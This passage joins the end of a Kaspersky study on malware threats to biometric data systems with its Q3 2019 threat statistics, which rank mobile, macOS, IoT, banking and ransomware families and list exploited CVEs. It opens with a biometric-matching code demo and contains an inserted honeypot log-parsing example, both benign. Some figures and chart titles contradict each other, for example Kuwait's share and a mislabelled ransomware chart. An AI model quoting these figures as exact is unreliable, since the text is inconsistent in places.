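    rejected = sum(not threshold_match(t, p, threshold) for t, p in zip(templates, genuine_probes))
    accepted = sum(threshold_match(t, p, threshold) for t, p in zip(templates, impostor_probes))
    return rejected / n_users, accepted / n_users


if __name__ == "__main__":
    enrolled = enroll(random.Random(1))
    probe = flip_one_bit(enrolled)
    print("one bit differs -> hash match:", hash_match(enrolled, probe),
          "| threshold(8) match:", threshold_match(enrolled, probe, 8))
    # Loosening the threshold lowers the false reject rate but raises the false
    # accept rate; there is no setting that makes both zero.
    print("threshold     FRR     FAR")
    for threshold in (12, 16, 20, 24, 28):
        frr, far = error_rates(threshold)
        print(f"{threshold:>9}  {frr:6.3f}  {far:6.3f}")
```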

Unfortunately, the problem pointed out by researchers in connection with the BioStar 2 story is by no means far-fetched. There are known cases of biometric data being targeted by attackers. For example, information stolen in a 2015 cyberattack included nearly six million fingerprints of people associated with the US government.

As the number of potential applications for biometric authentication systems grows, it could easily be envisaged that biometric data will be of interest not only to special services (which the Office of Personnel Management believes is most likely to have been behind their 2015 attack), but other categories of attackers, as well.

Threats blocked on biometric data processing and storage systems

With the risks described above in mind, we decided to evaluate to what extent biometric data processing systems (servers that process and store data, as well as workstations used to collect biometric data) are open to malware attacks, so we analyzed the threats blocked by Kaspersky products on such systems.

Research focus

Computers (servers and workstations) used to collect, process and store biometric data (such as fingerprints, hand geometry, face, voice and iris templates) on which Kaspersky products are installed.

Reporting period

Q3 2019.

One third of systems under threat

According to Kaspersky Security Network (KSN) data, in Q3 2019 malware was blocked on 37% of computers that perform the functions of collecting, processing and storing biometric data – in other words, one computer in three was at risk of malware infection.

It can be seen in the quarterly data below that although the percentage of computers on which malware was blocked has decreased by 6.6 percentage points since the beginning of 2019, it remains at a sufficiently high level.

Percentage of biometric processing system computers on which malware was blocked, Q1 – Q3 2019

Threat sources

An analysis of threat sources has shown that, as with many other systems that require heightened security measures (such as industrial automation systems, building management systems, etc.), the internet is the main source of threats for biometric data processing systems.

Main sources of threats for biometric data processing and storage systems, Q3 2019

Internet-borne threats were blocked on 14.4% of all biometric data processing systems. This category includes threats blocked on malicious and phishing websites, as well as web-based email services.

Removable media (8%) and network folders (6.1%) are most often used to distribute worms. After infecting a computer, worms commonly download spyware and remote access Trojans, as well as ransomware.

As for threats blocked in email clients, in most cases these were typical phishing emails (fake messages on the delivery of goods and services, the payment of invoices, RFQ, RFP, etc.) containing links to malicious websites or attached office documents with embedded malicious code.

Most dangerous

Among the threats blocked on biometric data processing and storage systems, we highlighted spyware, malware used in phishing attacks (mostly spyware downloaders and droppers), ransomware, and banking Trojans as posing the greatest danger to such systems.

Some of the malware types blocked on biometric data processing and storage systems

Overall, in Q3 2019 spyware was blocked on 5.4% of computers used to collect, process and store biometric data. Malware used in phishing attacks and ransomware was blocked on 5.1% and 1.9% of such computers, respectively.

It should be noted that other types of malware also included malicious programs designed to steal banking data (1.5%). It is not likely that these malicious programs were intended for stealing biometric data. However, it can be expected that mass-distributed malware designed to steal biometric data from banks and financial systems will appear in the near future.


As discussed above, in Q3 2019 37% of computers used to collect, process and store biometric data were at risk of malware infection. Among other malicious objects, Kaspersky products blocked modern remote-access Trojans (5.4% of all computers analyzed), malware used in phishing attacks (5.1%), ransomware (1.9%), and Trojan bankers (1.5%).

Although malware blocked on the computers analyzed is not specific to biometric data processing systems, the danger posed by it should not be underestimated.

Such malware is capable of:

  • stealing confidential information;
  • loading and executing arbitrary software;
  • enabling attackers to control infected computers remotely.

Although such threats are not specifically designed to steal biometric data or tamper with it, some of them have the technical capability to do that. In addition, the side effects of an active infection could significantly affect the availability of authentication systems and the integrity of biometric data.

This is why we believe that exposing biometric systems to random cyberthreats is a huge risk for both the service provider and the people who have entrusted their biometric data to it.

It should also be noted that, as we determined in the course of our research, biometric data processing and storage systems (and specifically biometric databases) are often deployed on application servers shared with other systems, rather than dedicated computers. In other words, if attackers compromise, say, a mail server or a database used by the website of an organization that has a biometric authentication system, the chances are that they will also find the biometric database on the same server.

Given all of the above, we believe that the existing situation with the security of biometric data is critical and needs to be brought to the attention of industry and government regulators and the community of information security experts, as well as the general public. After all, anyone can be at risk in this case, regardless of their occupation, professional background and skills.

IT threat evolution Q3 2019. Statistics

29 November, 2019 - 11:00

These statistics are based on detection verdicts of Kaspersky products received from users who consented to provide statistical data.

Quarterly figures

According to Kaspersky Security Network:

  • Kaspersky solutions blocked 989,432,403 attacks launched from online resources in 203 countries across the globe.
  • 560,025,316 unique URLs were recognized as malicious by Web Anti-Virus components.
  • Attempted infections by malware designed to steal money via online access to bank accounts were blocked on the computers of 197,559 users.
  • Ransomware attacks were defeated on the computers of 229,643 unique users.
  • Our File Anti-Virus detected 230,051,054 unique malicious and potentially unwanted objects.
  • Kaspersky products for mobile devices detected:
    • 870,617 malicious installation packages
    • 13,129 installation packages for mobile banking Trojans
    • 13,179 installation packages for mobile ransomware Trojans

Mobile threats

Quarterly highlights

In Q3 2019, we discovered an extremely unpleasant incident with the popular CamScanner app on Google Play. The new version of the app contained an ad library inside with the Trojan dropper Necro built in. Judging by the reviews on Google Play, the dropper’s task was to activate paid subscriptions, although it could deliver another payload if required.

Another interesting Trojan detected in Q3 2019 is Trojan.AndroidOS.Agent.vn. Its main function is to “like” Facebook posts when instructed by its handlers. Interestingly, to make the click, the Trojan attacks the Facebook mobile app on the infected device, literally forcing it to execute its command.

In the same quarter, we discovered new FinSpy spyware Trojans for iOS and Android. In the fresh versions, the focus is on snooping on correspondence in messaging apps. The iOS version requires a jailbreak to do its job, while the Android version is able to spy on the encrypted Threema app among others.

Mobile threat statistics

In Q3 2019, Kaspersky detected 870,617 malicious installation packages.

Number of detected malicious installation packages, Q4 2018 – Q3 2019

Whereas in previous quarters we observed a noticeable drop in the number of new installation packages, Q3’s figure was up by 117,067 packages compared to the previous quarter.

Distribution of detected mobile apps by type

Distribution of detected mobile apps by type, Q2 and Q3 2019

Among all the mobile threats detected in Q3 2019, the lion’s share went to potentially unsolicited RiskTool-class programs (32.1%), which experienced a fall of 9 p.p. against the previous quarter. The most frequently detected objects were in the RiskTool.AndroidOS families: Agent (33.07% of all detected threats in this class), RiskTool.AndroidOS.Wapron (16.43%), and RiskTool.AndroidOS.Smssend (10.51%).

Second place went to miscellaneous Trojans united under the Trojan class (21.68%), whose share increased by 10 p.p. The distribution within the class was unchanged since the previous quarter, with the Trojan.AndroidOS.Hiddapp (32.5%), Trojan.AndroidOS.Agent (12.8%), and Trojan.AndroidOS.Piom (9.1%) families remaining in the lead. Kaspersky’s machine-learning systems made a significant contribution to detecting threats: Trojans detected by this technology (the Trojan.AndroidOS.Boogr verdict) made up 28.7% — second place after Hiddapp.

In third place were Adware-class programs (19.89%), whose share rose by 1 p.p. in the reporting period. Most often, adware programs belonged to one of the following families: AdWare.AndroidOS.Ewind (20.73% of all threats in this class), AdWare.AndroidOS.Agent (20.36%), and AdWare.AndroidOS.MobiDash (14.27%).

Threats in the Trojan-Dropper class (10.44%) remained at the same level with insignificant (0.5 p.p.) growth. The vast majority of detected droppers belonged to the Trojan-Dropper.AndroidOS.Wapnor family (69.7%). A long way behind in second and third place, respectively, were Trojan-Dropper.AndroidOS.Wroba (14.58%) and Trojan-Dropper.AndroidOS.Agent (8.75%).

TOP 20 mobile malware programs

Note that this malware rating does not include potentially dangerous or unwanted programs classified as RiskTool or adware.

Verdict %*
1 DangerousObject.Multi.Generic 48.71
2 Trojan.AndroidOS.Boogr.gsh 9.03
3 Trojan.AndroidOS.Hiddapp.ch 7.24
4 Trojan.AndroidOS.Hiddapp.cr 7.23
5 Trojan-Dropper.AndroidOS.Necro.n 6.87
6 DangerousObject.AndroidOS.GenericML 4.34
7 Trojan-Downloader.AndroidOS.Helper.a 1.99
8 Trojan-Banker.AndroidOS.Svpeng.ak 1.75
9 Trojan-Dropper.AndroidOS.Agent.ok 1.65
10 Trojan-Dropper.AndroidOS.Hqwar.gen 1.52
11 Trojan-Dropper.AndroidOS.Hqwar.bb 1.46
12 Trojan-Downloader.AndroidOS.Necro.b 1.45
13 Trojan-Dropper.AndroidOS.Lezok.p 1.44
14 Trojan.AndroidOS.Hiddapp.cf 1.41
15 Trojan.AndroidOS.Dvmap.a 1.27
16 Trojan.AndroidOS.Agent.rt 1.24
17 Trojan-Banker.AndroidOS.Asacub.snt 1.21
18 Trojan-Dropper.AndroidOS.Necro.q 1.19
19 Trojan-Dropper.AndroidOS.Necro.l 1.12
20 Trojan-SMS.AndroidOS.Prizmes.a 1.12

* Unique users attacked by this malware as a percentage of all users of Kaspersky mobile solutions that were attacked.

First place in our TOP 20 as ever went to DangerousObject.Multi.Generic (48.71%), the verdict we use for malware detected using cloud technologies. Cloud technologies are deployed when the antivirus databases lack data for detecting a piece of malware, but the company’s cloud already contains information about the object. This is basically how the latest malicious programs are detected.

Second and sixth places were claimed by Trojan.AndroidOS.Boogr.gsh (9.03%) and DangerousObject.AndroidOS.GenericML (4.34%). These verdicts are assigned to files recognized as malicious by our machine-learning systems.

Third, fourth, and fourteenth places were taken by members of the Trojan.AndroidOS.Hiddapp family, whose task is to covertly foist ads onto victims.

Fifth, twelfth, eighteenth, and nineteenth positions went to Trojan droppers of the Necro family. Although this family showed up on the radar last quarter, really serious activity was observed only in this reporting period.

Seventh place goes to Trojan-Downloader.AndroidOS.Helper.a (1.99%), which is what members of the Necro family usually extract from themselves. Helper.a is tasked with downloading arbitrary code from malicious servers and running it.

The eighth place was taken by the malware Trojan-Banker.AndroidOS.Svpeng.ak (1.75%), the main task of which is to steal online banking credentials and intercept two-factor authorization codes.

Ninth position went to Trojan-Dropper.AndroidOS.Agent.ok (1.65%), which is distributed under the guise of FlashPlayer or a Rapidshare client. Most commonly, it drops adware modules into the infected system.

Tenth and eleventh places went to members of the Trojan-Dropper.AndroidOS.Hqwar family. The popularity of this dropper among cybercriminals continues to fall.

Geography of mobile threats

Geography of mobile malware infection attempts, Q3 2019

TOP 10 countries by share of users attacked by mobile malware

Country* %**
1 Iran 52.68
2 Bangladesh 30.94
3 India 28.75
4 Pakistan 28.13
5 Algeria 26.47
6 Indonesia 23.38
7 Nigeria 22.46
8 Tanzania 21.96
9 Saudi Arabia 20.05
10 Egypt 19.44

* Excluded from the rating are countries with relatively few users of Kaspersky mobile solutions (under 10,000).
** Unique users attacked by mobile bankers as a percentage of all users of Kaspersky mobile solutions in the country.

In Q3’s TOP 10, Iran (52.68%) retained top spot by share of attacked users. Note that over the reporting period the country’s share almost doubled. Kaspersky users in Iran most often encountered the adware app AdWare.AndroidOS.Agent.fa (22.03% of the total number of mobile threats), the adware-installing Trojan.AndroidOS.Hiddapp.bn (14.68%) and the potentially unwanted program RiskTool.AndroidOS.Dnotua.yfe (8.84%).

Bangladesh (30.94%) retained second place in the ranking. Users in this country most frequently encountered adware programs, including AdWare.AndroidOS.Agent.fc (27.58% of the total number of mobile threats) and AdWare.AndroidOS.HiddenAd.et (12.65%), as well as Trojan.AndroidOS.Hiddapp.cr (20.05%), which downloads adware programs.

India (28.75%) climbed to third place due to the same threats that were more active than others in Bangladesh: AdWare.AndroidOS.Agent.fc (36.19%), AdWare.AndroidOS.HiddenAd.et (17.17%) and Trojan.AndroidOS.Hiddapp.cr (22.05%).

Mobile banking Trojans

In the reporting period, we detected 13,129 installation packages for mobile banking Trojans, only 770 fewer than in Q2 2019.

The largest contributions to the statistics came from the Trojan-Banker.AndroidOS.Svpeng (40.59% of all detected banking Trojans), Trojan-Banker.AndroidOS.Agent (11.84%), and Trojan-Banker.AndroidOS.Faketoken (11.79%) families.

Number of installation packages for mobile banking Trojans detected by Kaspersky, Q3 2018 – Q3 2019

TOP 10 mobile banking Trojans

Verdict %*
1 Trojan-Banker.AndroidOS.Svpeng.ak 16.85
2 Trojan-Banker.AndroidOS.Asacub.snt 11.61
3 Trojan-Banker.AndroidOS.Svpeng.q 8.97
4 Trojan-Banker.AndroidOS.Asacub.ce 8.07
5 Trojan-Banker.AndroidOS.Agent.ep 5.51
6 Trojan-Banker.AndroidOS.Asacub.a 5.27
7 Trojan-Banker.AndroidOS.Faketoken.q 5.26
8 Trojan-Banker.AndroidOS.Agent.eq 3.62
9 Trojan-Banker.AndroidOS.Faketoken.snt 2.91
10 Trojan-Banker.AndroidOS.Asacub.ar 2.81

* Unique users attacked by this malware as a percentage of all users of Kaspersky mobile solutions that were attacked by banking threats.

The TOP 10 banking threats in Q3 2019 was headed by Trojans of the Trojan-Banker.AndroidOS.Svpeng family: Svpeng.ak (16.85%) took first place, and Svpeng.q (8.97%) third. This is not the first time we have detected amusing obfuscation in Trojans from Russian-speaking cybercriminals — this time the code of the malware Svpeng.ak featured the names of video games.

Snippets of decompiled code from Trojan-Banker.AndroidOS.Svpeng.ak

Second, fourth, sixth, and tenth positions in Q3 went to the Asacub Trojan family. Despite a decrease in activity, Asacub samples are still found on devices around the world.

Geography of mobile banking threats, Q3 2019

TOP 10 countries by share of users attacked by mobile banking Trojans:

Country* %**
1 Russia 0.30
2 South Africa 0.20
3 Kuwait 0.18
4 Tajikistan 0.13
5 Spain 0.12
6 Indonesia 0.12
7 China 0.11
8 Singapore 0.11
9 Armenia 0.10
10 Uzbekistan 0.10

* Excluded from the rating are countries with relatively few users of Kaspersky mobile solutions (under 10,000).
** Unique users attacked by mobile banking Trojans as a percentage of all users of Kaspersky mobile solutions in the country.

In Q3 Russia moved up to first place (0.30%), which impacted the entire pattern of mobile bankers spread around the world. Users in Russia were most often targeted with Trojan-Banker.AndroidOS.Svpeng.ak (17.32% of all attempts to infect unique users with mobile financial malware). The same Trojan made it into the TOP 10 worldwide. It is a similar story with second and third places: Trojan-Banker.AndroidOS.Asacub.snt (11.86%) and Trojan-Banker.AndroidOS.Svpeng.q (9.20%).

South Africa fell to second place (0.20%), where for the second quarter in a row Trojan-Banker.AndroidOS.Agent.dx (89.80% of all mobile financial malware) was the most widespread threat.

Bronze went to Kuwait (0.21%), where, like in South Africa, Trojan-Banker.AndroidOS.Agent.dx (75%) was most often encountered.

Mobile ransomware Trojans

In Q3 2019, we detected 13,179 installation packages for mobile ransomware — 10,115 fewer than last quarter. We observed a similar drop in Q2, so since the start of the year the number of mobile ransomware Trojans has decreased almost threefold. The reason, as we see it, is the decline in activity of the group behind the Asacub Trojan.

Number of installation packages for mobile banking Trojans, Q3 2018 – Q3 2019

TOP 10 mobile ransomware Trojans

Verdict %*
1 Trojan-Ransom.AndroidOS.Svpeng.aj 40.97
2 Trojan-Ransom.AndroidOS.Small.as 8.82
3 Trojan-Ransom.AndroidOS.Svpeng.ah 5.79
4 Trojan-Ransom.AndroidOS.Rkor.i 5.20
5 Trojan-Ransom.AndroidOS.Rkor.h 4.78
6 Trojan-Ransom.AndroidOS.Small.o 3.60
7 Trojan-Ransom.AndroidOS.Svpeng.ai 2.93
8 Trojan-Ransom.AndroidOS.Small.ce 2.93
9 Trojan-Ransom.AndroidOS.Fusob.h 2.72
10 Trojan-Ransom.AndroidOS.Small.cj 2.66

* Unique users attacked by this malware as a percentage of all users of Kaspersky mobile solutions that were attacked by ransomware Trojans.

In Q3 2019, the leading positions among ransomware Trojans were retained by members of the Trojan-Ransom.AndroidOS.Svpeng family. Top spot, as in the previous quarter, was claimed by Svpeng.aj (40.97%), with Svpeng.ah (5.79%) in third.

Geography of mobile ransomware Trojans, Q3 2019

TOP 10 countries by share of users attacked by mobile ransomware Trojans:

Country* %**
1 US 1.12
2 Iran 0.25
3 Kazakhstan 0.25
4 Oman 0.09
5 Qatar 0.08
6 Saudi Arabia 0.06
7 Mexico 0.05
8 Pakistan 0.05
9 Kuwait 0.04
10 Indonesia 0.04

* Excluded from the rating are countries with relatively few users of Kaspersky mobile solutions (under 10,000).
** Unique users attacked by mobile ransomware Trojans as a percentage of all users of Kaspersky mobile solutions in the country.

The leaders by number of users attacked by mobile ransomware Trojans, as in the previous quarter, were the US (1.12%), Iran (0.25%), and Kazakhstan (0.25%).

Attacks on Apple macOS

Q3 saw a lull in the emergence of new threats. An exception was the distribution of a modified version of the Stockfolio investment app, which contained an encrypted reverse shell backdoor.

TOP 20 threats for macOS

Verdict %*
1 Trojan-Downloader.OSX.Shlayer.a 22.71
2 AdWare.OSX.Pirrit.j 14.43
3 AdWare.OSX.Pirrit.s 11.73
4 AdWare.OSX.Pirrit.p 10.43
5 AdWare.OSX.Pirrit.o 9.71
6 AdWare.OSX.Bnodlero.t 8.40
7 AdWare.OSX.Spc.a 7.32
8 AdWare.OSX.Cimpli.d 6.92
9 AdWare.OSX.MacSearch.a 4.88
10 Adware.OSX.Agent.d 4.71
11 AdWare.OSX.Ketin.c 4.63
12 AdWare.OSX.Ketin.b 4.10
13 Downloader.OSX.InstallCore.ab 4.01
14 AdWare.OSX.Cimpli.e 3.86
15 AdWare.OSX.Bnodlero.q 3.78
16 AdWare.OSX.Cimpli.f 3.76
17 AdWare.OSX.Bnodlero.x 3.49
18 AdWare.OSX.Mcp.a 3.26
19 AdWare.OSX.MacSearch.d 3.18
20 AdWare.OSX.Amc.a 3.15

* Unique users attacked by this malware as a percentage of all users of Kaspersky security solutions for macOS that were attacked.

Like last quarter, the adware Trojan Shlayer was the top threat for macOS. This malware in turn downloaded adware programs of the Pirrit family, as a result of which its members took the second to fifth positions in our ranking.

Threat geography

    Country*    %**
1   France      6.95
2   India       6.24
3   Spain       5.61
4   Italy       5.29
5   US          4.84
6   Russia      4.79
7   Brazil      4.75
8   Mexico      4.68
9   Canada      4.46
10  Australia   4.27

* Excluded from the rating are countries with relatively few users of Kaspersky security solutions for macOS (under 10,000)
** Unique users attacked as a percentage of all users of Kaspersky security solutions for macOS in the country.

The geographical distribution of attacked users underwent some minor changes: India took silver with 6.24% of attacked users, while Spain came in third with 5.61%. France (6.95%) hung on to first position.

IoT attacks

IoT threat statistics

In Q3, the number of IP addresses of devices used to attack Kaspersky Telnet honeypots continued to decline. Whereas in Q2 Telnet's share was still significantly higher than that of SSH, in Q3 the two were almost equal.

SSH     48.17%
Telnet  51.83%

Distribution of attacked services by number of unique IP addresses of devices that carried out attacks, Q3 2019

By number of working sessions with Kaspersky traps, Telnet was likewise the more frequently used protocol in Q3.

SSH     40.81%
Telnet  59.19%

Distribution of cybercriminal working sessions with Kaspersky traps, Q3 2019
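The two distributions above come from the same honeypot data counted in two different ways: once by unique source IP address, once by session. The following Python is an added illustration of that difference, not Kaspersky's honeypot code; it parses a few constructed log lines in an assumed "timestamp service source-ip session-id" format (addresses from the RFC 5737 documentation ranges) and computes both shares.

```python
"""Share of Telnet vs. SSH activity on a honeypot, computed two ways.

Added example, not Kaspersky's code. The log format is an assumed,
simplified one: "<timestamp> <service> <source-ip> <session-id>".
"""
from collections import defaultdict

# Constructed sample log lines (not real telemetry). The same device
# (192.0.2.10) opens several Telnet sessions, so the unique-IP split and
# the session split differ, as they do in the report's two charts.
SAMPLE_LOG = """\
2019-07-01T00:00:01Z telnet 192.0.2.10 s1
2019-07-01T00:00:09Z telnet 192.0.2.10 s2
2019-07-01T00:01:15Z telnet 192.0.2.11 s3
2019-07-01T00:02:40Z ssh 198.51.100.5 s4
2019-07-01T00:03:02Z ssh 198.51.100.6 s5
2019-07-01T00:03:55Z telnet 192.0.2.10 s6
2019-07-01T00:04:10Z ssh 198.51.100.5 s7
"""


def parse(lines):
    """Yield (service, source_ip, session_id) tuples, skipping blanks/comments."""
    for line in lines.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        _timestamp, service, ip, session = line.split()
        yield service.lower(), ip, session


def _percentages(sets_by_service):
    total = sum(len(s) for s in sets_by_service.values())
    return {svc: round(100 * len(s) / total, 2) for svc, s in sets_by_service.items()}


def share_by_unique_ips(lines):
    """Share of each service by number of distinct attacking IP addresses."""
    ips = defaultdict(set)
    for service, ip, _ in parse(lines):
        ips[service].add(ip)
    return _percentages(ips)


def share_by_sessions(lines):
    """Share of each service by number of distinct working sessions."""
    sessions = defaultdict(set)
    for service, _, session in parse(lines):
        sessions[service].add(session)
    return _percentages(sessions)


if __name__ == "__main__":
    print("by unique IPs:", share_by_unique_ips(SAMPLE_LOG))
    print("by sessions:  ", share_by_sessions(SAMPLE_LOG))
```

With this sample the unique-IP split is 50/50 while the session split is about 57/43 in Telnet's favour, which is why the report presents both views: a few persistent devices can dominate the session count without changing the count of distinct attackers.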

Telnet-based attacks

Geography of IP addresses of devices from which attempts were made to attack Kaspersky Telnet traps, Q3 2019

TOP 10 countries by location of devices from which telnet-based attacks were carried out on Kaspersky traps

    Country   %*
1   China     13.78
2   Egypt     10.89
3   Brazil     8.56
4   Taiwan     8.33
5   US         4.71
6   Russia     4.35
7   Turkey     3.47
8   Vietnam    3.44
9   Greece     3.43
10  India      3.41

Last quarter's leaders, Egypt (10.89%), China (13.78%), and Brazil (8.56%), again made up the TOP 3, the only difference being that this time China took first place.

Telnet-based attacks most often resulted in the download of a member of the notorious Mirai family.

TOP 10 malware downloaded to infected IoT devices via successful telnet-based attacks

    Verdict                              %*
1   Backdoor.Linux.Mirai.b               38.08
2   Trojan-Downloader.Linux.NyaDrop.b    27.46
3   Backdoor.Linux.Mirai.ba              16.52
4   Backdoor.Linux.Gafgyt.bj              2.76
5   Backdoor.Linux.Mirai.au               2.21
6   Backdoor.Linux.Mirai.c                2.02
7   Backdoor.Linux.Mirai.h                1.81
8   Backdoor.Linux.Mirai.ad               1.66
9   Backdoor.Linux.Gafgyt.az              0.86
10  Backdoor.Linux.Mirai.a                0.80

* Share of malware type in the total amount of malware downloaded to IoT devices following a successful Telnet-based attack.

SSH-based attacks

Geography of IP addresses of devices from which attempts were made to attack Kaspersky SSH traps, Q3 2019

TOP 10 countries by location of devices from which attacks were made on Kaspersky SSH traps

    Country      %*
1   Egypt        17.06
2   Vietnam      16.98
3   China        13.81
4   Brazil        7.37
5   Russia        6.71
6   Thailand      4.53
7   US            4.13
8   Azerbaijan    3.99
9   India         2.55
10  France        1.53

In Q3 2019, the largest number of attacks on Kaspersky traps using the SSH protocol came from Egypt (17.06%). Vietnam (16.98%) and China (13.81%) took second and third places, respectively.

Financial threats

Financial threat statistics

In Q3 2019, Kaspersky solutions blocked attempts to launch one or more types of malware designed to steal money from bank accounts on the computers of 197,559 users.

Number of unique users attacked by financial malware, Q3 2019

Attack geography

To evaluate and compare the risk of being infected by banking Trojans and ATM/POS malware worldwide, for each country we calculated the share of users of Kaspersky products that faced this threat during the reporting period out of all users of our products in that country.

Geography of banking malware attacks, Q3 2019

TOP 10 countries by share of attacked users

    Country*      %**
1   Belarus       2.9
2   Uzbekistan    2.1
3   South Korea   1.9
4   Venezuela     1.8
5   Tajikistan    1.4
6   Afghanistan   1.3
7   China         1.2
8   Syria         1.2
9   Yemen         1.2
10  Sudan         1.1

* Excluded are countries with relatively few Kaspersky product users (under 10,000).
** Unique users whose computers were targeted by banking Trojans as a percentage of all unique users of Kaspersky products in the country.

TOP 10 banking malware families

    Name            Verdicts                             %*
1   Zbot            Trojan.Win32.Zbot                    26.7
2   Emotet          Backdoor.Win32.Emotet                23.9
3   RTM             Trojan-Banker.Win32.RTM              19.3
4   Nimnul          Virus.Win32.Nimnul                    6.6
5   Trickster       Trojan.Win32.Trickster                5.8
6   CliptoShuffler  Trojan-Banker.Win32.CliptoShuffler    5.4
7   Nymaim          Trojan.Win32.Nymaim                   3.6
8   SpyEye          Trojan-Spy.Win32.SpyEye               3.4
9   Danabot         Trojan-Banker.Win32.Danabot           3.3
10  Neurevt         Trojan.Win32.Neurevt                  1.8

* Unique users attacked by this malware as a percentage of all users attacked by financial malware.

The TOP 3 in Q3 2019 had the same faces as last quarter, only in a different order: the RTM family (19.3%) dropped from first to third, shedding almost 13 p.p., allowing the other two — Zbot (26.7%) and Emotet (23.9%) — to climb up. Last quarter we noted a decline in the activity of Emotet servers, but in Q3 it came back on track, with Emotet’s share growing by more than 15 p.p.

Fourth and fifth places did not change at all and are still occupied by Nimnul (6.6%) and Trickster (5.8%); their shares rose only marginally, by less than 1 p.p. Of the new entries in our TOP 10, worth noting is the banker CliptoShuffler (5.4%), which went straight into sixth place.

Ransomware programs

Quarterly highlights

The number of ransomware attacks against government agencies, as well as organizations in the healthcare, education, and energy sectors, continues to rise, a trend we already noted in the previous quarter.

A new type of attack, on network-attached storage (NAS) devices, is gaining ground. The infection scheme involves attackers scanning IP address ranges in search of NAS devices reachable from the Internet. Generally, only the web interface is accessible from the outside, and it is protected by an authentication page; however, a number of devices have vulnerabilities in their firmware. By exploiting such a vulnerability, cybercriminals install on the device a Trojan that encrypts all data on the media connected to the NAS. This is a particularly dangerous attack: in many cases the NAS is used to store backups, and such devices are generally perceived by their owners as a reliable means of storage, so the mere possibility of an infection can come as a shock.

Wipers have also become a more frequent attack tool. Like ransomware, such programs rename files and make ransom demands, but they irreversibly destroy the file contents (overwriting them with zeros or random bytes), so even if the victim pays, the original files are lost.

The FBI published decryption keys for GandCrab (verdict Trojan-Ransom.Win32.GandCrypt) versions 4 and 5. Support for decrypting these versions was added to the latest RakhniDecryptor build.

Number of new modifications

In Q3 2019, we identified three new families of ransomware Trojans and discovered 13,138 new modifications of this malware.

Number of new ransomware modifications, Q3 2018 – Q3 2019

Number of users attacked by ransomware Trojans

In Q3 2019, Kaspersky products defeated ransomware attacks against 229,643 unique KSN users. This is slightly fewer than the previous quarter.

Number of unique users attacked by ransomware Trojans, Q3 2019

July saw the largest number of attacked users — 100,380, almost 20,000 more than in June. After that, however, this indicator fell sharply and did not stray far from the figure of 90,000 attacked users.

Attack geography

Geographical spread of countries by share of users attacked by ransomware Trojans, Q3 2019

TOP 10 countries attacked by ransomware Trojans

    Country*      % of users attacked by cryptors**
1   Bangladesh    6.39
2   Mozambique    2.96
3   Uzbekistan    2.26
4   Nepal         1.71
5   Ethiopia      1.29
6   Ghana         1.19
7   Afghanistan   1.12
8   Egypt         0.83
9   Palestine     0.80
10  Vietnam       0.79

* Excluded are countries with relatively few Kaspersky users (under 50,000).
** Unique users whose computers were attacked by ransomware Trojans as a percentage of all unique users of Kaspersky products in the country.

TOP 10 most common families of ransomware Trojans

    Name                 Verdicts                                                % of attacked users*
1   WannaCry             Trojan-Ransom.Win32.Wanna                               20.96
2   (generic verdict)    Trojan-Ransom.Win32.Phny                                20.01
3   GandCrab             Trojan-Ransom.Win32.GandCrypt                            8.58
4   (generic verdict)    Trojan-Ransom.Win32.Gen                                  8.36
5   (generic verdict)    Trojan-Ransom.Win32.Encoder                              6.56
6   (generic verdict)    Trojan-Ransom.Win32.Crypren                              5.08
7   Stop                 Trojan-Ransom.Win32.Stop                                 4.63
8   Rakhni               Trojan-Ransom.Win32.Rakhni                               3.97
9   (generic verdict)    Trojan-Ransom.Win32.Crypmod                              2.77
10  PolyRansom/VirLock   Virus.Win32.PolyRansom, Trojan-Ransom.Win32.PolyRansom   2.50

* Unique Kaspersky users attacked by the specified family of ransomware Trojans as a percentage of all users attacked by ransomware Trojans.

Miners

Number of new modifications

In Q3 2019, Kaspersky solutions detected 11,753 new modifications of miners.

Number of new miner modifications, Q3 2019

Number of users attacked by miners

In Q3, we detected attacks using miners on the computers of 639,496 unique users of Kaspersky products worldwide.

Number of unique users attacked by miners, Q3 2019

The number of attacked users continued to decline in Q3, down to 282,334 in August. In September, this indicator began to grow — up to 297,394 — within touching distance of July’s figure.

Attack geography

Geographical spread of countries by share of users attacked by miners, Q3 2019

TOP 10 countries by share of users attacked by miners

    Country*      % of users attacked by miners**
1   Afghanistan   9.42
2   Ethiopia      7.29
3   Uzbekistan    4.99
4   Sri Lanka     4.62
5   Tanzania      4.35
6   Vietnam       3.72
7   Kazakhstan    3.66
8   Mozambique    3.44
9   Rwanda        2.55
10  Bolivia       2.43

* Excluded are countries with relatively few Kaspersky users (under 50,000).
** Unique users whose computers were attacked by miners as a percentage of all unique users of Kaspersky products in the country.

Vulnerable applications used by cybercriminals during cyber attacks

As before, in the statistics on the distribution of exploits used by cybercriminals, a huge share belongs to vulnerabilities in the Microsoft Office suite (73%). Most common of all, as in the previous quarter, were stack overflow errors (CVE-2017-11882, CVE-2018-0802) in the Equation Editor application, which was previously part of Microsoft Office. Other Microsoft Office vulnerabilities widely exploited this quarter were again CVE-2017-8570, CVE-2017-8759, and CVE-2017-0199.

Modern browsers are complex software products, which means that new vulnerabilities are constantly being discovered and used in attacks (13%). The most common target for cybercriminals is Microsoft Internet Explorer, vulnerabilities in which are often exploited in the wild. This quarter saw the discovery of the actively exploited zero-day vulnerability CVE-2019-1367, which causes memory corruption and allows remote code execution on the target system. The fact that Microsoft released an unscheduled patch for it points to how serious the situation was. Nor was Google Chrome problem-free this quarter, having received updates to fix a number of critical vulnerabilities (CVE-2019-13685, CVE-2019-13686, CVE-2019-13687, CVE-2019-13688), some of which allow intruders to circumvent all levels of browser protection and execute code in the system, bypassing the sandbox.

The majority of vulnerabilities used for privilege escalation inside the system stem from individual operating system services and popular apps. Privilege escalation vulnerabilities play a special role, as malicious software often uses them to gain persistence on the target system. Of note this quarter are the vulnerabilities CVE-2019-14743 and CVE-2019-15315, which allow systems with the popular Steam client installed to be compromised. A flaw in the Microsoft Windows Text Services Framework also warrants a mention: a Google researcher published a tool (CtfTool) demonstrating the problem, which allows processes to be run with system privileges, as well as the memory of other processes to be modified and arbitrary code to be executed in them.

Distribution of exploits used in attacks by type of application attacked, Q3 2019

